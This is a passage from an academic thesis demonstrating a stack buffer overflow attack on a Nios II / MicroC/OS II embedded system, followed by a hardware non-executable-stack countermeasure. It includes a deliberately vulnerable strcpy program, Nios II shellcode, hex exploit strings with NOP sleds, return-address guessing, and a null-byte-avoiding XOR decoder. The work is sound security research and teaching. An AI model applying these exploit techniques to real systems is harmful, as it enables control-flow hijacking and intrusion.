b. The movi instruction in line 2 loads register r15 with the decoding key (4 in this case).

c. The mov instruction in line 3 copies the value of the stack pointer into register r21.

. The ldbu instruction in line 4 loads data present at memory location [r21-8] into register

r5. When this instruction is executed for the first time, r5 will contain the first byte from

the (encoded) exploit code segment. Later, as the value of r21 changes (instructions in

line 8 and 9), the data loaded into r5 will be the next byte from the exploit code segment.

e. The xor instruction in line 5 does an exclusive or (XOR) of the data loaded into r5 with

the decoding key loaded into r15.

f. The stb instruction in line 6 stores back the decoded byte to its original location

g. The addi instruction in line 7 decrements register r7 so that the decoder knows exactly

when to stop decoding

32

h. The addi instructions in lines 8 and 9 effectively increase r21 by 1. The reason for not

directly using „addi r21, r21, 1‟ is to avoid null bytes. Incrementing r21 by 1 helps the

decoder to access the next byte of the encoded exploit code segment using the

instruction in line 4 i. The bne instruction in line 10 checks to see if the decoder is done decoding all of the

exploit code by checking the value of r7. If r7 is non zero, the decoder will continue to

fetch and decode each byte of the encoded data. The decoder‟s work is done as soon as

r7 becomes zero.

1. movi r7,64  initialize a counter(r7) with code length * 16 2. movi r15, 4  initialize r15 with the key 3. mov r21,sp  pointer to the encoded code

4. ldbu r5,-8(r21)  load the byte to be decoded 5. xor r5,r5,r15  decode the loaded byte 6. stb r5,-8(r21)  store back the decoded byte 7. addi r7,r7,-16  decrement the counter (to keep track of remaining code length) 8. addi r21,r21,5 9. addi r21,r21,-4  this and above instruction effectively moves the pointer to next byte 10. bne r7,0, <4>  continue this loop until we decode all the injected data

Figure 3.10: Decoder instructions

33

3.5 Code injection attack countermeasure

Programs running on most of the operating systems roughly adhere to the process memory layout shown in Figure 3.11.

The text section of the program stores the program code (instructions). The stack portion of the stack stores temporary data such as function parameters and return address [71]. Data section contains global variables and heap section is used for dynamically allocated data.

Figure 3.11: Program/process memory layout [71]

Non executable stack area [4, 17, 18, 20] is one of the solutions to prevent successful execution of code injection attacks. This countermeasure can be implemented using virtual memory support and modifies the operating system kernel.

34

3.5.1 Countermeasure implemented

But MicroC/OS II does not support virtual memory for the Nios II processor. Hence instead of operating system kernel modification, we implement a pure hardware based countermeasure to provide a non-executable stack region.

Figure 3.12: An example Nios II System [1]

It can be seen from Figure 3.12 that the Nios II architecture supports separate instruction and data buses. The data bus connects to both memory and peripheral components through the master port [1]. The instruction bus also connects to same memory (but not peripheral components) through the master port [1]. Hence we can classify it as a “Pseudo Harvard architecture” or “Modified Harvard architecture” [75], since the classical “Harvard architecture”

35

has separate memories and buses for instruction and data [75, 76]. Also, in the classical

“Harvard architecture” the data and program memory can differ in word width [75]

Imagine a scenario wherein we connect a single SRAM memory just to the data bus using the tristate bridge as shown in Figure 3.12. In that case the processor can never fetch data from the

SRAM memory as instructions

Therefore using Altera‟s SOPC builder [13] we build a Nios II system with an exclusive SRAM data memory and then using Nios II IDE [56] allocate the read/write data portion of the program to this dedicated memory as shown in Figure 3.13. It should be noted that „Stack memory‟ listed in Figure 3.13 indicates the task creating stacks [7] but not function calling stacks. Function call stacks come under the category „read/write data memory‟.

Hence even if the attacker is able to successfully generate and inject his exploit code, it will not be executed since the exploit code is not accessible to the instruction bus.

36

Figure 3.13: Allocation of read/write memory region to SRAM using Nios IDE

Table 3.1 shows available SRAM memory in various Altera development boards.

Board Available SRAM memory DE1 256K by 16 bits DE2 256K by 16 bits UP3 64k by 16 bits

Table 3.1: Available SRAM memory in Altera boards

3.5.2 Other approaches considered

One of the approaches initially thought of was to have a separate thread (task) to check for the processor program counter (PC) value of other tasks and alert the user whenever the value of PC is within the data memory range.

37

But this approach does not work with MicroC/OS II since each thread has its own set of CPU registers and stack area. Hence it‟s not possible to access information of one thread from another thread to generate an exception. This is illustrated in Figure 3.14.

Figure 3.14: Multiple task process control blocks [7]

A second approach considered was to add glue logic to the processor core to compare the PC with a predefined data memory range, which requires access to the PC register in the processor 38

core. Since the Nios II processor is a proprietary processor, this approach could not be implemented. An open source processor is an option for this approach, but we also need to have a corresponding C compiler to handle processor modifications.

3.6 Buffer overflow in complex programs

Most of the real life stack based buffer overflow attacks target simple function call programs.

But buffer overflow is possible in complex programs having recursive function calls. One such example is mentioned in [74]. The attack might need a larger number of attempts using NOP

Sled technique because the actual buffer location on the stack can be too far from the approximate stack address found by executing the simple program in Figure 3.1.

3.7 Conclusion

In this chapter we have discussed various steps, hindrances and ways to overcome the null byte problem in order to perform a code injection attack. We also discussed how to prevent execution of the exploit code with the help of an exclusive data memory in the Nios II system.

Chapter 4 will demonstrate all these concepts with the help of the Nios II processor, Nios II IDE and SOPC builder.

39

4. RESULTS

This chapter demonstrates the code injection attack and its prevention using the Nios II IDE

(version 10.1) [56], Nios II processor [1], MicroC/OS II RTOS Kernel [7] and SOPC builder

(version 10.1) [13].

4.1 Initial stack address

The program shown in Figure 4.1 calculates and prints the initial stack address of the system the attacker is trying to exploit. The program is written in the C language using MircoC/OS II.

Executing this program is required before the actual attack.

The „main‟ function of this program first creates a task „task1‟ using the OSTaskCreateExt() function by passing task1‟s address along with other arguments[13]. Then the OSStart() function runs the highest priority task that is „Ready‟ to run[13]. OSTaskCreateExt() and

OSStart() are more typically found in a multitasking application. In the present case, the attacker just needs to find the initial stack address and one task would be enough.

The task „task1‟ in turn calls a function which returns the value of the stack pointer (sp). The value is then printed on to the console, which is, for this system:

0x81ab10

Note that the above value is specific to the Nios II and MicroC/OS II system being used. The value may change if the address mapping, memory capacity, processor or kernel of the system

40

changes. The output (of the program in Figure 4.1) will then be used by the attacker to guess the approximate starting address of the vulnerable buffer.

/*C program using MicroC to find approximate stack starting address*/ #include "string.h"

#include #include "includes.h"

/* Definition of Task stack */ #define TASK_STACKSIZE 2048 OS_STK task1_stk[TASK_STACKSIZE];

/* Definition of Task priority */ #define TASK1_PRIORITY 1

unsigned long get_sp(void) { asm(" mov r2, sp"); }

/* Prints the value of stack address */ void task1(void* pdata)

{ printf("0x%x\n", get_sp()); }

/* The main function creates one task*/ int main(void) { OSTaskCreateExt(task1, NULL, (void *)&task1_stk[TASK_STACKSIZE-1], TASK1_PRIORITY, TASK1_PRIORITY, task1_stk, TASK_STACKSIZE, NULL, 0); OSStart();

return 0; }

Figure 4.1: C program to find stack address using MicroC/OS II 41

4.2 The vulnerable program

Consider the hypothetical program in Figure 4.2. This program has a „process_input „ C function that processes a string passed from the task „task1‟. It can be seen that the

„process_input„ function uses the „strcpy‟ library function, which is vulnerable to buffer overflows. The „critical_function‟ is not called anywhere in the program, hence it is never executed.

The output of the program in Figure 4.2 is:

Processing called function....!! In main function executed assignment of x. The value of x is 1

42

/*A buffer overflow vulnerable C program using MicroC*/ #include "string.h" #include #include "includes.h" /* Definition of Task Stack */ #define TASK_STACKSIZE 2048 OS_STK task1_stk[TASK_STACKSIZE]; #define TASK1_PRIORITY 1 /*data passed is copied into local buffer*/ void process_input(char *stringpassed) { char name[90]; strcpy(name, stringpassed) ; printf("Processing called function....!!\n"); return; } /* 1.Calls the function. 2. Prints the value of x */ void task1(void* pdata) { int x = 0; x *= 2; process_input("someinputpassed"); x = 1; printf("In main function executed assignment of x. The value of x is %d \n",x); } /*The main function creates one task*/ int main(void) { OSTaskCreateExt(task1,

NULL, (void *)&task1_stk[TASK_STACKSIZE-1],

TASK1_PRIORITY, TASK1_PRIORITY, task1_stk, TASK_STACKSIZE, NULL, 0); OSStart(); return 0; }

/*Target function for attack*/ void critical_function(){ printf("Hacked: The flow has been successfully changed\n"); }

Figure 4.2: A buffer overflow vulnerable program 43

4.3 The attack

The code injection attack (refer to section 2.2 for details) executes the code injected onto the stack primarily to spawn a new shell. This work instead targets changing the program execution flow by executing code on the stack (similar to the „Twilight Hack‟ in Wii in 2008[66]).

The attacker‟s objective is to make the program in Figure 4.2 execute „critical_function‟ when

„process_input „ function returns, instead of executing „x=1;‟ statement. For the current Nios II and Micro C system, the address of „critical_function‟ (as 0x0080030c) in the memory space can be found using „nios2-elf-objdump‟ utility (refer to the tutorial section in the appendix). In general, Ltrace, gdb or similar utilities [5, 72] will be used. In the case of the “Twilight Hack”, since the target code („critical_function‟ in Figure 4.2) was always saved by the attacker in the

SD memory slot, the address was constant due to memory mapping.

As discussed in section 3.2, the attacker first passes (an arbitrary) string „1234567890‟ (of length 10) to the function to see if the program malfunctions. The attacker observes that a string of length 10 does not have any effect on the program and output is still the same. The attacker continues this process until the program, in this case, malfunctions for a string

„1234567890123456789012345678901234567890123456789012345678901234567890123456

78901234567890123456‟ of length 96. But the attacker also has to consider the null byte which gets appended at the end of each string. Hence the effective length is 96+1=97 bytes.

But C compilers allocate memory in multiples of the word size, implying that the effective buffer length (L) is 100 bytes. Note that L is not exactly equal to the vulnerable buffer length. L is the distance from the start of the buffer to the „return address‟ memory location.

44

The attacker now knows the initial stack address and the effective length of the buffer. At this stage the attacker uses NOP sled technique (refer to section 3.3 for details) with the initial stack address (found in section 4.1) to point the new return address (ra) into the buffer region. Figure

4.3 further explains the structure of the attacker input (also known as exploit string) at this stage.

Figure 4.3: Exploit string

The next step is to develop exploit code. As described earlier, the exploit code‟s objective would be to execute the „critical_function‟ located at the memory location 0x0080030c. This can be easily achieved using the „callr‟ instruction in the Nios II processor [1]. The attacker first stores the value 0x0080030c in some register, say r5 and later use the „callr‟ assembly instruction which transfers execution to the address contained in „r5‟. The complete code is as shown in Figure 4.4.

orhi r5,r0, 0x0080 addi r5,r5,0x030c  This and above instructions load target address in „r5‟ callr r5

Figure 4.4: Nios II instructions that call sub routine at 0x0080030c

45

Hence the attacker has exploit code of length 12 bytes (3 instructions x 4 bytes per instruction).

But the effective buffer length is 100 bytes. The remaining 84(=100-12-4) bytes can be filled with NOP instructions for NOP Sled. This is illustrated in Figure 4.5.

Figure 4.5: Exploit string components‟ length

The Nios II processor implements NOP instruction as „add r0, r0, r0‟ [1]. But „add r0, r0, r0‟ when encoded will have null bytes in it. Hence in order to avoid this problem, the attacker can implement NOP as „xor r5, r5, r5‟. This instruction simply flushes r5. The complete exploit string instructions are shown in Figure 4.6.

46

Figure 4.6: Instructions in the exploit string

To supply (input) a string in hexadecimal format to C programs, we need to use an „\x‟ character for each byte. Since the Nios II architecture is little endian [1], the equivalent input string for the „xor r5, r5, r5‟ instruction is „\x3a\xf0\x4a\x29‟. Hence the attacker input (i.e., argument for the „process_input‟ function of the program in Figure 4.2) in this case is shown in

Figure 4.7.

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\x10\xab\x81\x00

Figure 4.7: Exploit string binary equivalent of Figure 4.6

47

The exploit string in Figure 4.7 has NOPs at the beginning, followed by the exploit code and then the return address. Note that the return address „0x0081ab10‟ (=\x10\xab\x81\x00) in

Figure 4.7 is the initial guess of the attacker. But the exact address of the buffer can be a few hundred bytes above or below this address. Since the exploit string has 21 NOPs, the attacker can increase (attempts 2, 4, 6, 8 and 10 in Table 4.1 below) or decrease (attempts 3, 5, 7 and 9 in Table 4.1 below) the address „0x0081ab10‟ by 84(=21x4) bytes and test it on the program in

Figure 4.2 as an estimated return address.

Table 4.1 lists various attempts carried out by the attacker. For attempts 1 through 9, the output of the program in Figure 4.2 is as shown in Figure 4.8. The output indicates buffer overflow because the program has not terminated as expected (i.e., the printf statement in the main function is not executed) and it‟s an unsuccessful exploit because the expected execution flow change has not been achieved.

Processing called function....!!

Figure 4.8: Program output for unsuccessful exploit string

48

Attempt # Estimated return address Status of the exploit

1 0x0081ab10 Fail

2 0x0081ab64 Fail

3 0x0081aabc Fail

4 0x0081abb8 Fail

5 0x0081aa68 Fail

6 0x0081ac0c Fail

7 0x0081aa14 Fail

8 0x0081ac60 Fail

9 0x0081a9c0 Fail

10 0x0081acb4 Success

Table 4.1: Exploit attempts with estimated return address

The attacker has succeeded on the 10th attempt. The exploit string in this case is as shown in

Figure 4.9 and the output of the vulnerable program in Figure 4.2 is as shown in Figure 4.10.

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xb4\xac\x81\x00

Figure 4.9: Successful exploit string

49

Processing called function....!! Hacked: The flow has been successfully changed

Figure 4.10: Program output for successful exploit string

4.4 The null byte problem

The work done by the instructions in Figure 4.4 can also be achieved using just a single Nios II

„jmpi 0x80030c‟ instruction. But, as shown in Figure 4.11, the „jmpi 0x80030c‟ instruction when encoded (0x080030c1) contains a null byte in it.

Figure 4.11: Exploit string with null byte

In this scenario, the attacker can choose to replace the null byte with some arbitrary byte (say

„ff‟ as shown in Figure 4.11) before injecting the code. During program execution this byte will

50

be replaced with a null byte using the instructions in Figure 3.8. Section 3.4.3 explains why „-6‟ is used in the instruction „stb r5,-6(sp)‟. The value to be subtracted (-6) from the stack pointer

(sp) varies depending on the null byte position relative to sp.

Since the Altera Nios II is a pipelined processor, run time modification of the word 0x8ff30c1 to 0x80030c1 ( „jmpi 0x80030c‟) by previous instructions results in a RAW(Read After Write) data hazard. Experimental analysis shows that there should be at least a 4 cycle gap between the instructions that modify the exploit code and the exploit code itself. Hence the modified exploit string to account for RAW data hazard is shown in Figure 4.12.

Figure 4.12: Modified exploit string to avoid RAW hazard

The binary equivalent of the exploit string in Figure 4.12 is as shown in Figure 4.13. Note that the attacker is now using the estimated return address found in the 10th attempt in Table 4.1.

51

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3

a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\x f0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\ x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x85\xfe\x7f\xd9\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\xc1\x30\xff\x08\xb4\xac\x81\x00

Figure 4.13: Exploit string binary equivalent of Figure 4.12

One of the outputs of the vulnerable program in Figure 4.2 with the Figure 4.13 exploit string is as shown in Figure 4.10. Occasionally, the „critical_function‟ gets executed twice (or thrice) as shown in Figure 4.14.

Processing called function....!!

Hacked: The flow has been successfully changed Hacked: The flow has been successfully changed

Figure 4.14: Multiple execution of „critical_function‟

A null byte in the exploit code can also be removed using encoder/decoder as discussed in section 3.4.4 and Figure 3.10. The exploit string in this case is as shown in Figure 4.15. The two modifications for decoder with respect to Figure 3.10 are:

Since the exploit code is 20 (=5x4) bytes, the „movi r7, 320‟ instruction is moving the

value „320‟(=20x16) into r7 (refer to 3.4.4 for details).

The „ldbu‟ and „stb‟ instructions access data starting from the 24th byte(20 bytes of

exploit code and 4 bytes of return address) from the stack pointer and continue until the

encoded exploit exhausts.

52

Figure 4.15: Exploit string with an embedded decoder

Also note that the exploit string can now accommodate just 9 NOP instructions (as opposed to

21 in Figure 4.11) due to the decoder instructions. Consequently, the number of attempts required (similar to Table 2) for a successful exploit might increase.

The equivalent binary string of the Figure 4.15 is as shown in Figure 4.16.

53

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3

a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x04\x50\xc0\x01\x04\ x01\xc0\x03\x3a\x88\x2b\xd8\x03\xfa\x7f\xa9\x3a\xf0\xca\x2b\x05\xfa\x7f\xa9\x04\xfc \xff\x39\x44\x01\x40\xad\x04\xff\x7f\xad\x1e\xf9\x3f\x38\x3e\xf4\x4e\x2d\x3e\xf4\x4e \x2d\x3e\xf4\x4e\x2d\x3e\xf4\x4e\x2d\xc5\x34\x04\x0c\xb4\xac\x81\x00

Figure 4.16: Exploit string binary equivalent of Figure 4.15

The output of the vulnerable program with this exploit string is the same as shown in Figure

4.10 and Figure 4.14.

4.5 Prevention

To prevent a successful exploit, as mentioned in section 3.5 and shown in Figure 3.13, the function region of the program memory is now allocated in an exclusive SRAM memory. In this case the initial stack address (i.e., obtained by executing the program in Figure

4.1) is

0x203938

Since the attack is now effectively prevented, the attacker cannot apply the Table 4.1 strategy to know the effective buffer address. For demonstration purposes, let‟s assume that 0x2038d4 (this address can be found using Nios II IDE, refer to the tutorial section in the appendix) is the effective buffer address. Figure 4.17 shows the modified exploit string of Figure 4.9 for initial stack address 0x2038d4

54

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xd4\x38\x20\x00

Figure 4.17: Exploit string for an exclusive SRAM Nios II system

The output of the vulnerable program (Figure 4.2) for the Figure 4.17 exploit string is as shown in Figure 4.8. The output implies buffer overflow but unsuccessful exploit.

Though the attacker might not know why the attack is unsuccessful, the developer on the other hand can know what went wrong with the program execution. The Nios II IDE tool has a feature called „Instruction Trace‟. This feature helps trace instructions currently being executed, one at a time. Hence when the PC gets into the SRAM memory region, the trace shows the following error:

ERROR: address 2038d4 is not in Memory

The message implies that the instruction currently being fetched (which is located at buffer address 0x2038d4 in the stack region) is not in the Instruction Memory region. Figure 4.18 shows the instruction trace as seen in Nios II IDE.

55

Figure 4.18: Instruction trace showing error fetching instruction

4.6 Summary

This chapter described how to carry out an execution flow change using buffer overflow vulnerability, how to overcome null bytes in the null code and how to prevent a successful stack based buffer overflow attack when using the Nios II processor. The tutorial section in the appendix describes how to use the Nios II IDE and Quartus II tools to implement the attack and prevention.

56

5. CONCLUSIONS AND FUTURE WORK

5.1 Conclusions

We briefly discussed various embedded systems security attacks. We then discussed in detail a class of software based attacks, buffer overflow attacks. A step by step procedure involved to carry out a stack based buffer overflow attack was presented. These attacks are important to study due to their popularity and relative ease of implementation.

The attack was demonstrated using a specimen embedded system with the Altera Nios II softcore processor and Micrium MicroC/OS II RTOS kernel. Exploit code encoding and NOP

Sled technique were used to carry out the attack. We also presented a method to prevent the attack for the given system constraints (virtual memory support, processor buses.).

Conceptually, stack based buffer overflow attacks are simple but their implementation demands advance knowledge about the processor architecture and the operating system.

Hence, we conclude that it is important that the designer should be aware of the security aspects of the components used in the embedded system and apply appropriate preventive measures to mitigate the security attacks.

5.2 Future Work

This work demonstrates stack based buffer overflow and a simple hardware based preventive measure. Micrium MicroC/OS II operating system kernel modification with or without virtual memory support as a prevention measure is one of the future research goals.

57

Further, future work should also consider other types of software attacks that need to be considered while designing a secure embedded system. Developing security protocols for specific example systems is also of interest.

58

REFERENCES

1. Altera Corporation, “Nios II Processor Reference Handbook”, December 2010

2. Aleph One, "Smashing the stack for fun and profit", Phrack 49,

http://insecure.org/stf/smashstack.html, date accessed April 2011

3. CERN , “Common vulnerabilities guide for C programmers”,

http://security.web.cern.ch/security/recommendations/en/codetools/c.shtml, date

accessed April 2011

4. Cowan, C., Wagle, P., Calton Pu, Beattie, S. and Walpole, J., “Buffer overflows: attacks

and defenses for the vulnerability of the decade”, DARPA Information Survivability

Conference and Exposition, 2000

5. Foster, J., Osipov, V. and Bhalla, N., Buffer Overflow Attacks: Detect, Exploit, Prevent.

Syngress Publishing, 2005

6. Kaempf, M., “ Vudo malloc tricks”, Phrack 57,

http://www.phrack.org/issues.html?issue=57&id=8, August 2001, date accessed April

2011

7. Labrosse, J., MicroC OS II: The Real Time Kernel , CMP Books, 2002

8. http://www.altera.com/products/ip/processors/nios2/tools/embed-partners/micrium/emb-

micrium.html, date accessed April 2011

9. Bhatkar, E., Duvarney, D., Sekar, R., “Address obfuscation: an efficient approach to

combat a broad range of memory error exploits”, Proceedings of the 12th USENIX

Security Symposium, 2003

10. “Apache htpasswd buffer overflow”, http://xforce.iss.net/xforce/xfdb/17413, date

accessed April 2011 59

11. “Apache 1.3.37 htpasswd is vulnerable to buffer overflow vulnerability”,

https://issues.apache.org/bugzilla/show_bug.cgi?id=41279, date accessed April 2011

12. http://en.wikipedia.org/wiki/Buffer_overflow#History_of_exploitation, date accessed

April 2011

13. Altera Corporation, SOPC Builder User Guide, December 2010

14. Parameswaran, S. and Wolf, T., “Embedded systems security - an overview”, Design

Automation for Embedded Systems, Sep 2008

15. Kc, GS., Keromytis, AD., Prevelakis, V., “Countering code-injection attacks with

instruction-set randomization” , Proceedings of the 10th ACM Conference on Computer

and Communications Security, 2003

16. Jim, T., Morrisett, G., Grossman, D., Hicks, M., Cheney, J. and Wang, Y., “Cyclone: A

Safe Dialect of C”, Proceedings of the General Track of the USENIX Annual Technical

Conference (ATEC '02), 2002

17. http://www.usenix.org/events/sec02/full_papers/lhee/lhee_html/node7.html, date

accessed April 2011

18. SolarDesigner, “Linux kernel patch from the Openwall Project”,

http://www.openwall.com/linux/README.shtml, date accessed April 2011

19. Cowan, C., Maier, D., Hinto, H., Bakke, P.,Grier, A., Wagle, P., Calton Pu, Beattie, S.,

Zhang, Q. and Walpole, J., “StackGuard: automatic adaptive detection and prevention of

buffer-overflow attacks”, 7th USENIX Security Conference, 1998

20. Noordergraaf, A. and Watson, K., “Solaris Operating Environment Security” ,

http://www.sun.com/blueprints/0100/security.pdf date accessed April 2011

60

21. strcpy, http://www.cplusplus.com/reference/clibrary/cstring/strcpy/, date accessed April

2011

22. strcmp, http://www.cplusplus.com/reference/clibrary/cstring/strcmp/, date accessed

April 2011

23. strcat, http://www.cplusplus.com/reference/clibrary/cstring/strcat/, date accessed April

2011

24. Parameswaran, S. and Wolf, T., “Embedded systems security - an overview”, Design

Automation for Embedded Systems, Sep 2008

25. Ravi, S., Raghunathan, A. and Chakradhar, S., “Tamper resistance mechanisms for

secure, embedded systems”, 17th International Conference on VLSI Design, January

2004

26. Ravi, S., Raghunathan, A., Kocher, P. and Hattangady, S., “Security in embedded

systems: design challenges”. Trans Embed Comput Syst, 3(3), 461–491, 2004

27. Arora, D., Ravi, S., Raghunathan, A. and Jha, NK., ”Secure embedded processing

through hardware assisted runtime monitoring”, Proceedings of the Design, Automation

and Test in Europe (DATE‟05), 2005

28. Nedjah, N., Mourelle, L. and Martins da Silva, R., “Efficient hardware for modular

exponentiation using the sliding-window method”, Proceedings of the International

Conference on Information Technology, 17-24, 2007

29. May, D., Muller, HL. and Smart, NP., “Non-deterministic processors”, Proceedings of

the 6th Australasian Conference on and Privacy, 115–129, 2001

61

30. Akkar, M. and Giraud, C., “An implementation of DES and AES, secure against some

attacks”, Proceedings of Cryptographic Hardware and Embedded Systems, 309–318,

2001

31. Chevallier-Mames, B., Ciet, M. and Joye, M., “Low-cost solutions for preventing

simple sidechannel analysis: side-channel atomicity”, IEEE Transactions on Computers

, 53(6), 760–768, 2004

32. Kocher, P., Lee, R., McGraw, Gary. and Raghunathan, A., “Security as a new dimension

in embedded system design”, Proceedings of the 41st Annual Design Automation

Conference(DAC '04), 753-760, 2004

33. Rohatgi, P., Electromagnetic Attacks and Countermeasures, Cryptographic Engineering,

Springer US, 407-430, 2009

34. Kuhn, M., ”The TrustNo 1 Cryptoprocessor Concept”, CS555 Report, Purdue

University , 1997

35. McLoughlin, I., "Secure embedded systems: the threat of reverse engineering", 14th

IEEE International Conference on Parallel and Distributed Systems(ICPADS '08), 2008

36. Kšmmerling, O. and Kuhn, M., “Design principles for tamper-resistant smartcard

processors”, Proceedings of the USENIX Workshop on Smartcard Technology, 1999

37. Feng, J. and Seel, J., “Design security with waveforms” , White Paper by Altera,

http://www.altera.co.jp/literature/cp/cp_sdr_design_security.pdf

38. Messier, M. and Viega, J. , “Safe C string library”, Available at

http://www.zork.org/safestr/, date accessed April 2011

62

39. Ozdoganoglu, H., Vijaykumar, T.N., Brodley, C., Kuperman, B. and Jalote, A.,

“SmashGuard: A hardware solution to prevent security attacks on the function return

address”, IEEE Transactions on Computers,55(10), 1271-1285, 2006

40. Shacham, H., Page, M., Pfaff, B., Goh, E.J., Modadugu, N. and Boneh, D., “On the

Effectiveness of Address-Space Randomization“, Proceedings of the 11th ACM

Conference on Computer and Communications Security, 298-307, 2004

41. Buffer Overflows , http://www.freebsd.org/doc/en/books/developers-handbook/secure-

bufferov.html, date accessed April 2011

42. CERT® Advisory CA-2003-04 MS-SQL Server Worm,

http://www.cert.org/advisories/CA-2003-04.html, date accessed April 2011

43. Perl: Buffer overflow, http://www.gentoo.org/security/en/glsa/glsa-200711-28.xml, date

accessed April 2011

44. “Apache <= 1.3.33 htpasswd local overflow”,

http://www.vulnerabilityscanning.com/Apache-1-3-33-htpasswd-local-overflow-

Test_14771.htm, date accessed April 2011

45. “Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability”,

http://www.securityfocus.com/bid/13777/discuss, date accessed April 2011

46. ftp://ftp.ovh.net/made-in-ovh/clickandsee/apache_1.3.24/src/support/htpasswd.c, , date

accessed April 2011

47. PaX, http://pax.grsecurity.net/docs/aslr.txt, date accessed April 2011

48. UP3 Education Board, http://www.altera.com/education/univ/materials/boards/unv-up3-

board.html, date accessed April 2011

63

49. Tong, J.G., Anderson, I.D.L. and Khalid, M.A.S., “Soft-core processors for embedded

systems”, The 18th International Conference on Microelectronics (ICM), 2006

50. µC/OS-II Kernel , http://www.micrium.com/page/products/rtos/os-ii, date accessed

April 2011

51. Shao, Z., Zhuge, Q., He, Yi. and Sha, E., “Defending embedded systems against buffer

overflow via hardware/software”, Proceedings of the 19th Annual Computer Security

Applications Conference, 2003

52. Embedded Systems/C Programming,

http://en.wikibooks.org/wiki/Embedded_Systems/C_Programming, date accessed April

2011

53. Ogorkiewicz, M. and Frej, P, “Analysis of Buffer Overflow Attacks”,

http://www.windowsecurity.com/articles/analysis_of_buffer_overflow_attacks.html,

2002

54. Gerg, I., “An overview and example of the buffer-overflow exploit”, IAnewsletter,

Spring 2005, http://iac.dtic.mil/iatac/download/Vol7_No4.pdf

55. execve(2) - Linux man page, http://linux.die.net/man/2/execve, date accessed April 2011

56. Altera Corporation, “Nios II Software Developer‟s Handbook”, February 2011

57. Brumley, D., Chiueh, T., Johnson, R., Lin, H. and Song, D., “RICH: Automatically

protecting against integer-based vulnerabilities”, Symp. on Network and Distributed

Systems Security, 2007

58. “Options to Request or Suppress Warnings”, http://gcc.gnu.org/onlinedocs/gcc-

4.1.2/gcc/Warning-Options.html#Warning-Options, date accessed April 2011

64

59. Ringenburg, M. and Grossman, Dan., “Preventing format-string attacks via automatic

and efficient dynamic checking”, Proceedings of the 12th ACM Conference on

Computer and Communications Security, 2005

60. Cowan, C., Beattie, S., Barringer, M., Kroah- Hartman, G.,Frantzen, M. and Lokier, J.,

“FormatGuard: automatic protection from printf format string vulnerabilities”,

Proceedings of the 10th USENIX Security Symposium, 2001

61. Howard, M., “Safe integer arithmetic in C,”

http://blogs.msdn.com/b/michael_howard/archive/2006/02/02/523392.aspx , 2006, date

accessed April 2011

62. Shay Gueron, “Intel® Advanced Encryption Standard(AES) Instructions Set”, White

Paper, 2010, http://software.intel.com/en-us/articles/intel-advanced-encryption-standard-

aes-instructions-set/, , date accessed April 2011

63. http://www.cert.org/homeusers/buffer_overflow.html, date accessed April 2011

64. http://www.eeye.com/Resources/Security-Center/Research/Security-

Advisories/AL20010717, date accessed April 2011

65. http://www.microsoft.com/technet/security/bulletin/ms02-039.mspx, date accessed April

2011

66. http://en.wikipedia.org/wiki/Twilight_hack, date accessed April 2011

67. http://en.wikipedia.org/wiki/PS2_Independence_Exploit#PlayStation_2, date accessed

April 2011

68. http://www.us-cert.gov/cas/techalerts/index.html, date accessed April 2011

69. http://www.sans.org/top-cyber-security-risks/trends.php, date accessed April 2011

65

70. http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx, date accessed April

2011

71. Silberschatz, A, Galvin, P. Gagne, G., Operating Systems Concepts, John Wiley & Sons,

82, 2005

72. http://www.infosecwriters.com/texts.php?op=display&id=150, date accessed April 2011

73. Hamblen, J., Hall, T. and Furman, M., Rapid Prototyping of Digital Systems, Quartus(R)

Edition, Springer, 2008

